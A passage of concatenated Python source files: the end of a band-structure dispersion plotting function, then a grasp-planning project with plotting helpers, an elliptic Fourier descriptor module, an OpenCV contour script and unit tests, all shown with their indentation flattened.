x = array([[i for i in range(len(d)//el)] for j in range(el)])
elif qcomponent!=-1:
x = xscale*d[:,2:5][:,qcomponent]
if xshift != 0:
x += xshift
if ratios:
data = abs(sum(d[:,5:], axis=1))
data2 = abs(sum(d2[:,5:], axis=1))
data = (data-data2)/(data+data2)
if yshift != 0:
y += yshift
if scale_alpha_data:
dtmp = data.copy()
dtmp = linspace(dtmp.min(), dtmp.max(), 1000)
colors = cmap(dtmp)
dtmp = dtmp - dtmp.min()
dtmp = dtmp/dtmp.max()
colors[:,-1] = alpha*(dtmp)
cmap = ListedColormap(colors)
alpha = 1.
if ratios and atoms3!=[]:
colors = cmap(data/data.max())
colors[:,-1] = abs(sum(d3[:,5:], axis=1))/abs(sum(d3[:,5:], axis=1)).max()
if alpha_reverse:
colors[:,-1] = 1 - colors[:,-1]
if ratios:
if plotmode=='scatter':
scatter(x,y,s=s, lw=0, c=colors, cmap=cmap, rasterized=raster)
else:
lx = len(set(x.reshape(-1))); ly = len(set(y.reshape(-1)))
pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, rasterized=raster, edgecolor='face', linewidths=0.0001)
#pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, rasterized=raster)
else:
if plotmode=='scatter':
scatter(x,y,c=data, s=s, lw=0, cmap=cmap, alpha=alpha, rasterized=raster)
else:
lx = len(set(x.reshape(-1))); ly = len(set(y.reshape(-1)))
pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, rasterized=raster, edgecolor='face', linewidths=0.0001)
#pcolormesh(x.reshape(ly,lx), y.reshape(ly,lx), data.reshape(ly,lx), cmap=cmap, alpha=alpha, rasterized=raster)
if clims!=[]: clim(clims[0], clims[1])
if clrbar: colorbar()
# plot fermi level
if not noefline:
if color=='':
axhline(ef, ls=ls_ef, lw=lw_ef, color='grey')
else:
axhline(ef, color=color, ls=ls_ef, lw=lw_ef)
# set axis labels
xlabel(xlab)
ylabel(ylab)
# print path to title
if totonly and ptitle is None:
title(getcwd())
else:
title(ptitle)
if return_data:
data = abs(sum(d[:,5:], axis=1))
if ratios:
data2 = abs(sum(d2[:,5:], axis=1))
data3 = abs(sum(d3[:,5:], axis=1))
return x, y, data, data2, data3
else:
return x, y, data
``` |
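A hedged usage sketch for `dispersionplot`; the directory path is a placeholder, and the run directory is expected to contain the `qdos.XX.Y.dat` files plus `inputcard` (parsed via a shell `grep` call) and optionally `potential` for the Fermi energy.

```python
# Illustrative only: the path is an assumption; needs `grep` on the PATH.
from masci_tools.vis.kkr_plot_bandstruc_qdos import dispersionplot
from matplotlib.pyplot import show

# With ratios=False and return_data=True the function returns (x, y, data).
x, y, data = dispersionplot('path/to/qdos_run/', units='eV_rel',
                            reload_data=True, return_data=True)
show()
```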
{
"source": "jpchiodini/Grasp-Planning",
"score": 3
} |
#### File: jpchiodini/Grasp-Planning/PlotUtils.py
```python
def finalPlot(P, finalX, finalY, image=None, contour=None, n=300):
# plot final grasping point representation.
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
if contour is not None:
plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'y', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
plt.plot(P[finalX, 0], P[finalX, 1], 'r+', linewidth=2)
plt.plot(P[finalY, 0], P[finalY, 1], 'r+', linewidth=2)
# plt.show(block=True)
plt.pause(0.01)
plt.show(block=True)
def plot_efd(P, N, Cbar, image=None, contour=None, n=200):
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
# print(contour[:,1],contour[:,0])
# for ii in range(1, len(xt)):
# plt.plot(xt[ii], yt[ii], 'r*', linewidth=2)
# plt.show()
# plt.set_title(str(n + 1))
if contour is not None:
plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'r', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
for ii in range(1, n):
if Cbar[ii] > 0:
plt.plot(P[ii, 0], P[ii, 1], 'y*', linewidth=2)
plt.show()
```
#### File: jpchiodini/Grasp-Planning/pyefd.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
import numpy
from sympy import *
class Model(object):
def __init__(self, order=10, normalize=False):
# initialize the model; initEFDModel only takes the order (normalize is currently unused)
self.px, self.py, self.zx, self.zy, self.nx, self.ny = initEFDModel(order)
def elliptic_fourier_descriptors(contour, order=10, normalize=False):
"""Calculate elliptical Fourier descriptors for a contour.
:param numpy.ndarray contour: A contour array of size ``[M x 2]``.
:param int order: The order of Fourier coefficients to calculate.
:param bool normalize: If the coefficients should be normalized;
see references for details.
:return: A ``[order x 4]`` array of Fourier coefficients.
:rtype: :py:class:`numpy.ndarray`
"""
dxy = np.diff(contour, axis=0)
dt = np.sqrt((dxy ** 2).sum(axis=1))
t = np.concatenate([([0., ]), np.cumsum(dt)])
T = t[-1]
phi = (2 * np.pi * t) / T
coeffs = np.zeros((order, 4))
for n in range(1, order + 1):
const = T / (2 * n * n * np.pi * np.pi)
phi_n = phi * n
d_cos_phi_n = np.cos(phi_n[1:]) - np.cos(phi_n[:-1])
d_sin_phi_n = np.sin(phi_n[1:]) - np.sin(phi_n[:-1])
a_n = const * np.sum((dxy[:, 0] / dt) * d_cos_phi_n)
b_n = const * np.sum((dxy[:, 0] / dt) * d_sin_phi_n)
c_n = const * np.sum((dxy[:, 1] / dt) * d_cos_phi_n)
d_n = const * np.sum((dxy[:, 1] / dt) * d_sin_phi_n)
coeffs[n - 1, :] = a_n, b_n, c_n, d_n
if normalize:
coeffs = normalize_efd(coeffs)
return coeffs
def normalize_efd(coeffs, size_invariant=True):
"""Normalizes an array of Fourier coefficients.
See [#a]_ and [#b]_ for details.
:param numpy.ndarray coeffs: A ``[n x 4]`` Fourier coefficient array.
:param bool size_invariant: If size invariance normalizing should be done as well.
Default is ``True``.
:return: The normalized ``[n x 4]`` Fourier coefficient array.
:rtype: :py:class:`numpy.ndarray`
"""
# Make the coefficients have a zero phase shift from
# the first major axis. Theta_1 is that shift angle.
theta_1 = 0.5 * np.arctan2(
2 * ((coeffs[0, 0] * coeffs[0, 1]) + (coeffs[0, 2] * coeffs[0, 3])),
((coeffs[0, 0] ** 2) - (coeffs[0, 1] ** 2) + (coeffs[0, 2] ** 2) - (coeffs[0, 3] ** 2)))
# Rotate all coefficients by theta_1.
for n in range(1, coeffs.shape[0] + 1):
coeffs[n - 1, :] = np.dot(
np.array([[coeffs[n - 1, 0], coeffs[n - 1, 1]],
[coeffs[n - 1, 2], coeffs[n - 1, 3]]]),
np.array([[np.cos(n * theta_1), -np.sin(n * theta_1)],
[np.sin(n * theta_1), np.cos(n * theta_1)]])).flatten()
# Make the coefficients rotation invariant by rotating so that
# the semi-major axis is parallel to the x-axis.
psi_1 = np.arctan2(coeffs[0, 2], coeffs[0, 0])
psi_rotation_matrix = np.array([[np.cos(psi_1), np.sin(psi_1)],
[-np.sin(psi_1), np.cos(psi_1)]])
# Rotate all coefficients by -psi_1.
for n in range(1, coeffs.shape[0] + 1):
coeffs[n - 1, :] = psi_rotation_matrix.dot(
np.array([[coeffs[n - 1, 0], coeffs[n - 1, 1]],
[coeffs[n - 1, 2], coeffs[n - 1, 3]]])).flatten()
if size_invariant:
# Obtain size-invariance by normalizing.
coeffs /= np.abs(coeffs[0, 0])
return coeffs
def calculate_dc_coefficients(contour):
"""Calculate the :math:`A_0` and :math:`C_0` coefficients of the elliptic Fourier series.
:param numpy.ndarray contour: A contour array of size ``[M x 2]``.
:return: The :math:`A_0` and :math:`C_0` coefficients.
:rtype: tuple
"""
dxy = np.diff(contour, axis=0)
dt = np.sqrt((dxy ** 2).sum(axis=1))
t = np.concatenate([([0., ]), np.cumsum(dt)])
T = t[-1]
xi = np.cumsum(dxy[:, 0]) - (dxy[:, 0] / dt) * t[1:]
A0 = (1 / T) * np.sum(((dxy[:, 0] / (2 * dt)) * np.diff(t ** 2)) + xi * dt)
delta = np.cumsum(dxy[:, 1]) - (dxy[:, 1] / dt) * t[1:]
C0 = (1 / T) * np.sum(((dxy[:, 1] / (2 * dt)) * np.diff(t ** 2)) + delta * dt)
# A0 and C0 relate to the first point of the contour array as origin.
# Adding those values to the coefficients to make them relate to true origin.
return contour[0, 0] + A0, contour[0, 1] + C0
def initEFDModel(order):
a = Symbol('a')
b = Symbol('b')
c = Symbol('c')
d = Symbol('d')
m = Symbol('m')
n = Symbol('n')
a1 = Symbol('a1')
a2 = Symbol('a2')
a3 = Symbol('a3')
a4 = Symbol('a4')
b1 = Symbol('b1')
b2 = Symbol('b2')
b3 = Symbol('b3')
b4 = Symbol('b4')
c1 = Symbol('c1')
c2 = Symbol('c2')
c3 = Symbol('c3')
c4 = Symbol('c4')
d1 = Symbol('d1')
d2 = Symbol('d2')
d3 = Symbol('d3')
d4 = Symbol('d4')
a_ = [a1, a2, a3, a4]
b_ = [b1, b2, b3, b4]
c_ = [c1, c2, c3, c4]
d_ = [d1, d2, d3, d4]
x = a * cos(2 * n * pi * m) + b * sin(2 * n * pi * m)
y = c * cos(2 * n * pi * m) + d * sin(2 * n * pi * m)
dx = x.diff(m)
dy = y.diff(m)
Zx_sym = 0
Zy_sym = 0
Px = lambdify((a, b, n, m), x)
Py = lambdify((c, d, n, m), y)
Zx = lambdify((a, b, n, m), dx)
Zy = lambdify((c, d, n, m), dy)
# precomputed symbolic stuff, will be good for real time
for n_ in range(order):
dx1 = dx.subs([(a, a_[n_]), (b, b_[n_]), (n, n_ + 1)])
dy1 = dy.subs([(c, c_[n_]), (d, d_[n_]), (n, n_ + 1)])
# symbolic value of dx,dy
Zx_sym += dx1
Zy_sym += dy1
Z = sqrt(Zx_sym ** 2 + Zy_sym ** 2)
dx_norm = Zx_sym / Z
dy_norm = Zy_sym / Z
ddx_norm = dx_norm.diff(m)
ddy_norm = dy_norm.diff(m)
tt = [m]
ax = a_ + b_ + c_ + d_ + tt
Nx = lambdify(ax, ddx_norm)
Ny = lambdify(ax, ddy_norm)
return Px, Py, Zx, Zy, Nx, Ny
def generateEFDModel(coeffs, locus, numPts, px, py, zx, zy, nx, ny):
m_ = np.linspace(0, 1.0, numPts)
Px = np.ones((numPts)) * locus[0]
Py = np.ones((numPts)) * locus[1]
Zx = 0
Zy = 0
a = []
b = []
c = []
d = []
# precompute symbolic stuff, will be good for real time
for n_ in range(coeffs.shape[0]):
a.append(coeffs[n_, 0])
b.append(coeffs[n_, 1])
c.append(coeffs[n_, 2])
d.append(coeffs[n_, 3])
Px += px(a[n_], b[n_], (n_ + 1), m_)
Py += py(c[n_], d[n_], (n_ + 1), m_)
Zx += zx(a[n_], b[n_], (n_ + 1), m_)
Zy += zy(c[n_], d[n_], (n_ + 1), m_)
# put together all the variables:
N = np.zeros((numPts, 3))
for i in range(0, numPts):
ax = a + b + c + d
ax.append(m_[i])
N[i, 0] = nx(*ax)
N[i, 1] = ny(*ax)
N[i, 2] = 0
# calculate norm of normal vector
# N = np.zeros((numPts, 3))
# N[:, 0] = Nx
# N[:, 1] = Ny
# N[:, 2] = 0
P = np.zeros((numPts, 3))
P[:, 0] = Px
P[:, 1] = Py
P[:, 2] = 0
C = np.linalg.norm(N, axis=1)
# cross product tells whether we have concave or convex curvature.
crossProd = np.zeros(len(Zx))
for ii in range(0, len(Zx)):
aa = np.array([Zx[ii], Zy[ii], 0])
bb = np.array(N[ii, :])
crossProd[ii] = np.cross(aa, bb)[2]
Cbar = np.sign(crossProd) * abs(C)
return P, N, Cbar
# def generateEFDModel(coeffs, locus=(0., 0.), numPts=300):
# a = Symbol('a')
# b = Symbol('b')
# c = Symbol('c')
# d = Symbol('d')
# m = Symbol('m')
# n = Symbol('n')
#
# x = a * cos(2 * n * pi * m) + b * sin(2 * n * pi * m)
# y = c * cos(2 * n * pi * m) + d * sin(2 * n * pi * m)
#
# dx = x.diff(m)
# dy = y.diff(m)
#
# m_ = np.linspace(0, 1.0, numPts)
#
# Px = np.ones((numPts)) * locus[0]
# Py = np.ones((numPts)) * locus[1]
#
# Zx = 0
# Zy = 0
#
# Zx_sym = 0
# Zy_sym = 0
#
# fx1 = lambdify((a, b, n, m), x)
# fy1 = lambdify((c, d, n, m), y)
# fdx1_norm = lambdify((a, b, n, m), dx)
# fdy1_norm = lambdify((c, d, n, m), dy)
#
# # precompute symbollic stuff, will be good for real time
# for n_ in _range(coeffs.shape[0]):
# dx1 = dx.subs([(a, coeffs[n_, 0]), (b, coeffs[n_, 1]), (n, n_ + 1)])
# dy1 = dy.subs([(c, coeffs[n_, 2]), (d, coeffs[n_, 3]), (n, n_ + 1)])
#
# # symbolic value of dx,dy
# Zx_sym += dx1
# Zy_sym += dy1
#
# # this would be the real time portion
# for n_ in _range(coeffs.shape[0]):
# # numerical values for x,y,dx,dy
# Px += fx1(coeffs[n_, 0], coeffs[n_, 1], (n_ + 1), m_)
# Py += fy1(coeffs[n_, 2], coeffs[n_, 3], (n_ + 1), m_)
#
# Zx += fdx1_norm(coeffs[n_, 0], coeffs[n_, 1], (n_ + 1), m_)
# Zy += fdy1_norm(coeffs[n_, 2], coeffs[n_, 3], (n_ + 1), m_)
#
# Z = sqrt(Zx_sym ** 2 + Zy_sym ** 2)
# dx_norm = Zx_sym / Z
# dy_norm = Zy_sym / Z
#
# ddx = Zx_sym.diff(m)
# ddy = Zy_sym.diff(m)
# ddx_norm = dx_norm.diff(m)
# ddy_norm = dy_norm.diff(m)
#
# fdx1_norm_t = lambdify(m, dx_norm)
# fdy1_norm_t = lambdify(m, dy_norm)
# fdx1_norm = lambdify(m, ddx_norm)
# fdy1_norm = lambdify(m, ddy_norm)
# fdx1 = lambdify(m, ddx)
# fdy1 = lambdify(m, ddy)
#
# Nx_norm = fdx1_norm(m_)
# Ny_norm = fdy1_norm(m_)
# Nx = fdx1(m_)
# Ny = fdy1(m_)
# Tx = fdx1_norm_t(m_)
# Ty = fdy1_norm_t(m_)
#
# # calculate norm of normal vector
# N = np.zeros((numPts, 3))
# N[:, 0] = Nx_norm
# N[:, 1] = Ny_norm
# N[:, 2] = 0
#
# P = np.zeros((numPts, 3))
# P[:, 0] = Px
# P[:, 1] = Py
# P[:, 2] = 0
#
# C = np.linalg.norm(N, axis=1)
#
# # cross product tells whether we have concave or convex curvature.
# crossProd = np.zeros(len(Zx))
# for ii in range(0, len(Zx)):
# aa = np.array([Zx[ii], Zy[ii], 0])
# bb = np.array([Nx_norm[ii], Ny_norm[ii], 0])
# crossProd[ii] = np.cross(aa, bb)[2]
#
# Cbar = np.sign(crossProd) * abs(C)
# return P, N, Cbar
def plot_efd(P, N, Cbar, image=None, contour=None, n=300):
"""Plot a ``[2 x (N / 2)]`` grid of successive truncations of the series.
.. note::
Requires `matplotlib <http://matplotlib.org/>`_!
:param numpy.ndarray coeffs: ``[N x 4]`` Fourier coefficient array.
:param list, tuple or numpy.ndarray locus:
The :math:`A_0` and :math:`C_0` elliptic locus in [#a]_ and [#b]_.
:param int n: Number of points to use for plotting of Fourier series.
"""
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
# print(contour[:,1],contour[:,0])
# for ii in range(1, len(xt)):
# plt.plot(xt[ii], yt[ii], 'r*', linewidth=2)
# plt.show()
# plt.set_title(str(n + 1))
# if contour is not None:
# plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'r', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
for ii in range(1, n):
if Cbar[ii] > 0:
plt.plot(P[ii, 0], P[ii, 1], 'y*', linewidth=2)
plt.show()
def finalPlot(P, finalX, finalY, image=None, contour=None, n=300):
"""Plot a ``[2 x (N / 2)]`` grid of successive truncations of the series.
.. note::
Requires `matplotlib <http://matplotlib.org/>`_!
:param numpy.ndarray coeffs: ``[N x 4]`` Fourier coefficient array.
:param list, tuple or numpy.ndarray locus:
The :math:`A_0` and :math:`C_0` elliptic locus in [#a]_ and [#b]_.
:param int n: Number of points to use for plotting of Fourier series.
"""
try:
import matplotlib.pyplot as plt
except ImportError:
print("Cannot plot: matplotlib was not installed.")
return
# print(contour[:,1],contour[:,0])
# for ii in range(1, len(xt)):
# plt.plot(xt[ii], yt[ii], 'r*', linewidth=2)
# plt.show()
# plt.set_title(str(n + 1))
# if contour is not None:
# plt.plot(contour[:, 0], contour[:, 1], 'c--', linewidth=2)
plt.plot(P[:, 0], P[:, 1], 'y', linewidth=2)
if image is not None:
plt.imshow(image, plt.cm.gray)
# plt.show()
plt.plot(P[finalX, 0], P[finalX, 1], 'r+', linewidth=2)
plt.plot(P[finalY, 0], P[finalY, 1], 'r+', linewidth=2)
plt.show()
```
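As a quick check of the descriptor routines above, the coefficients of a simple closed contour can be computed and the outline re-synthesised from the truncated series (the same reconstruction formula appears in `test_fit_1` further below); the square contour is just an illustrative example, assuming the module above is importable as `pyefd`.

```python
import numpy as np
import pyefd

# Illustrative example contour: a closed unit square, listed point by point.
square = np.array([[0., 0.], [1., 0.], [1., 1.], [0., 1.], [0., 0.]])

locus = pyefd.calculate_dc_coefficients(square)            # (A0, C0) offset of the series
coeffs = pyefd.elliptic_fourier_descriptors(square, order=8)

# Re-synthesise the outline from the truncated Fourier series.
t = np.linspace(0, 1.0, 200)
xt = np.ones_like(t) * locus[0]
yt = np.ones_like(t) * locus[1]
for n in range(coeffs.shape[0]):
    xt += coeffs[n, 0] * np.cos(2 * (n + 1) * np.pi * t) + \
          coeffs[n, 1] * np.sin(2 * (n + 1) * np.pi * t)
    yt += coeffs[n, 2] * np.cos(2 * (n + 1) * np.pi * t) + \
          coeffs[n, 3] * np.sin(2 * (n + 1) * np.pi * t)
```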
#### File: jpchiodini/Grasp-Planning/test_pp.py
```python
import numpy as np
from matplotlib import pyplot as plt
import pyefd
import Grasping
import cv2 as cv
import rospy
from std_msgs.msg import String
def find_current_grasp():
# find the contour of the image.
# img = cv.imread('test5.png', 0)
img = cv.imread('test5.png',0)
img = 255-img
kernel = np.ones((15, 15), np.uint8)
img = cv.dilate(img, kernel, 1)
img = cv.erode(img, kernel, 1)
t = 180
# create binary image
# gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
blur = cv.GaussianBlur(img, (5, 5), 0)
(t, binary) = cv.threshold(blur, t, 255, cv.THRESH_BINARY)
cv.imshow("output",binary)
# find contours
(_, contours, _) = cv.findContours(binary, cv.RETR_EXTERNAL,
cv.CHAIN_APPROX_NONE)
# print table of contours and sizes
print("Found %d objects." % len(contours))
for (i, c) in enumerate(contours):
print("\tSize of contour %d: %d" % (i, len(c)))
# draw contours over original image
cv.drawContours(img, contours, -1, (0, 0, 255), 5)
# display original image with contours
cv.namedWindow("output", cv.WINDOW_NORMAL)
cv.imshow("output", img)
cv.waitKey(0)
edge = cv.Canny(img, 100, 200)
_, cnts, _ = cv.findContours(edge.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)
cv.imshow('g',edge)
cv.waitKey(0)
cnts = sorted(cnts, key=cv.contourArea, reverse=True)[:1]
screenCnt = None
contour_1 = np.vstack(cnts[0]).squeeze()
plt.imshow(img, plt.cm.gray)
plt.plot(contour_1[:, 0], contour_1[:, 1])
plt.show()
# plots clockwise
# for ii in range(1, len(contour_1)):
# plt.plot(contour_1[ii,0], contour_1[ii,1], 'y*', linewidth=2)
# plt.show()
numPts = 200
order = 4
# pre-calculate symbolic variables so we can solve numerically in the loop.
px, py, zx, zy, nx, ny = pyefd.initEFDModel(order)
# this part runs in the loop:
# 1) calculate the EFD silhouette:
locus = pyefd.calculate_dc_coefficients(contour_1)
coeffs = pyefd.elliptic_fourier_descriptors(contour_1, order)
# 2) Build the grasping point model from silhouette data, and compute best grasp.
P, N, Cbar = pyefd.generateEFDModel(coeffs, locus, numPts, px, py, zx, zy, nx, ny)
pyefd.plot_efd(P, N, Cbar, img, contour_1, numPts)
xLoc, yLoc = Grasping.GraspPointFiltering(numPts, P, N, Cbar)
pyefd.finalPlot(P, xLoc, yLoc, img, contour_1, numPts)
return xLoc, yLoc
if __name__ == '__main__':
find_current_grasp()
```
#### File: jpchiodini/Grasp-Planning/tests.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
import pyefd
lbl_1 = 5
img_1 = np.array(
[[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 191, 64, 127, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 127, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 64, 0, 0, 0, 0, 64, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 0, 0, 0, 0, 64, 127, 64, 64, 0, 0, 64, 191, 255, 255, 255,
255],
[255, 255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 127, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 64, 0, 0, 127, 255, 255, 191, 64, 0, 0, 0, 0, 0, 64, 127, 127, 255, 255, 255,
255, 255],
[255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 191, 0, 0, 0, 64, 127, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 64, 0, 0, 0, 0, 0, 64, 191, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 64, 0, 0, 0, 0, 64, 191, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 191, 127, 0, 0, 0, 0, 127, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 191, 127, 0, 0, 0, 64, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 191, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 127, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 127, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 191, 255, 255, 255, 255, 127, 0, 0, 0, 191, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 127, 255, 255, 191, 64, 0, 0, 0, 191, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 191, 255, 255, 255, 255, 255, 255, 255,
255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 0, 0, 0, 0, 64, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 127, 0, 0, 0, 64, 191, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255]])
contour_1 = np.array([[24.0, 13.0125], [23.0125, 14.0], [23.004188481675392, 15.0], [23.0, 15.0125], [22.0125, 16.0],
[22.00313725490196, 17.0], [22.0, 17.004188481675392], [21.0, 17.004188481675392],
[20.004188481675392, 18.0], [20.0, 18.004188481675392], [19.0, 18.006299212598424],
[18.0, 18.006299212598424], [17.0, 18.004188481675392], [16.9875, 18.0], [16.0, 17.0125],
[15.993700787401576, 17.0], [15.0, 16.006299212598424], [14.995811518324608, 16.0],
[14.9875, 15.0], [14.0, 14.0125], [13.995811518324608, 14.0], [13.9875, 13.0], [13.0, 12.0125],
[12.996862745098039, 12.0], [12.993700787401576, 11.0], [12.9875, 10.0], [12.0, 9.0125],
[11.0, 9.003137254901961], [10.0, 9.006299212598424], [9.006299212598424, 10.0],
[9.003137254901961, 11.0], [9.003137254901961, 12.0], [9.004188481675392, 13.0], [9.0125, 14.0],
[10.0, 14.9875], [10.003137254901961, 15.0], [10.003137254901961, 16.0],
[10.003137254901961, 17.0], [10.003137254901961, 18.0], [10.003137254901961, 19.0],
[10.0, 19.0125], [9.0125, 20.0], [9.006299212598424, 21.0], [9.006299212598424, 22.0],
[9.0, 22.006299212598424], [8.9875, 22.0], [8.0, 21.0125], [7.996862745098039, 21.0],
[7.996862745098039, 20.0], [8.0, 19.9875], [8.9875, 19.0], [8.9875, 18.0],
[8.993700787401576, 17.0], [8.9875, 16.0], [8.0, 15.0125], [7.996862745098039, 15.0],
[7.9875, 14.0], [7.0, 13.0125], [6.993700787401575, 13.0], [6.0, 12.006299212598424],
[5.993700787401575, 12.0], [5.9875, 11.0], [5.995811518324607, 10.0], [6.0, 9.996862745098039],
[7.0, 9.9875], [7.9875, 9.0], [8.0, 8.995811518324608], [8.995811518324608, 8.0],
[9.0, 7.995811518324607], [10.0, 7.9875], [10.9875, 7.0], [11.0, 6.995811518324607],
[12.0, 6.995811518324607], [12.0125, 7.0], [13.0, 7.9875], [13.003137254901961, 8.0],
[13.006299212598424, 9.0], [13.0125, 10.0], [14.0, 10.9875], [14.004188481675392, 11.0],
[14.006299212598424, 12.0], [15.0, 12.993700787401576], [15.004188481675392, 13.0],
[15.006299212598424, 14.0], [16.0, 14.993700787401576], [16.00313725490196, 15.0],
[17.0, 15.996862745098039], [17.006299212598424, 16.0], [18.0, 16.993700787401576],
[19.0, 16.993700787401576], [19.993700787401576, 16.0], [20.0, 15.993700787401576],
[20.993700787401576, 15.0], [21.0, 14.9875], [21.9875, 14.0], [21.995811518324608, 13.0],
[21.99686274509804, 12.0], [21.99686274509804, 11.0], [21.993700787401576, 10.0],
[21.0, 9.006299212598424], [20.993700787401576, 9.0], [21.0, 8.993700787401576],
[22.0, 8.996862745098039], [22.006299212598424, 9.0], [23.0, 9.993700787401576],
[23.006299212598424, 10.0], [24.0, 10.993700787401576], [24.00313725490196, 11.0],
[24.00313725490196, 12.0], [24.00313725490196, 13.0], [24.0, 13.0125]])
def test_efd_shape_1():
coeffs = pyefd.elliptic_fourier_descriptors(contour_1, order=10)
assert coeffs.shape == (10, 4)
def test_efd_shape_2():
c = pyefd.elliptic_fourier_descriptors(contour_1, order=40)
assert c.shape == (40, 4)
def test_normalizing_1():
c = pyefd.elliptic_fourier_descriptors(contour_1, normalize=False)
assert np.abs(c[0, 0]) > 0.0
assert np.abs(c[0, 1]) > 0.0
assert np.abs(c[0, 2]) > 0.0
def test_normalizing_2():
c = pyefd.elliptic_fourier_descriptors(contour_1, normalize=True)
np.testing.assert_almost_equal(c[0, 0], 1.0, decimal=14)
np.testing.assert_almost_equal(c[0, 1], 0.0, decimal=14)
np.testing.assert_almost_equal(c[0, 2], 0.0, decimal=14)
def test_locus():
locus = pyefd.calculate_dc_coefficients(contour_1)
np.testing.assert_array_almost_equal(locus, np.mean(contour_1, axis=0), decimal=0)
def test_fit_1():
n = 300
locus = pyefd.calculate_dc_coefficients(contour_1)
coeffs = pyefd.elliptic_fourier_descriptors(contour_1, order=20)
t = np.linspace(0, 1.0, n)
xt = np.ones((n,)) * locus[0]
yt = np.ones((n,)) * locus[1]
for n in range(coeffs.shape[0]):
xt += (coeffs[n, 0] * np.cos(2 * (n + 1) * np.pi * t)) + \
(coeffs[n, 1] * np.sin(2 * (n + 1) * np.pi * t))
yt += (coeffs[n, 2] * np.cos(2 * (n + 1) * np.pi * t)) + \
(coeffs[n, 3] * np.sin(2 * (n + 1) * np.pi * t))
assert True
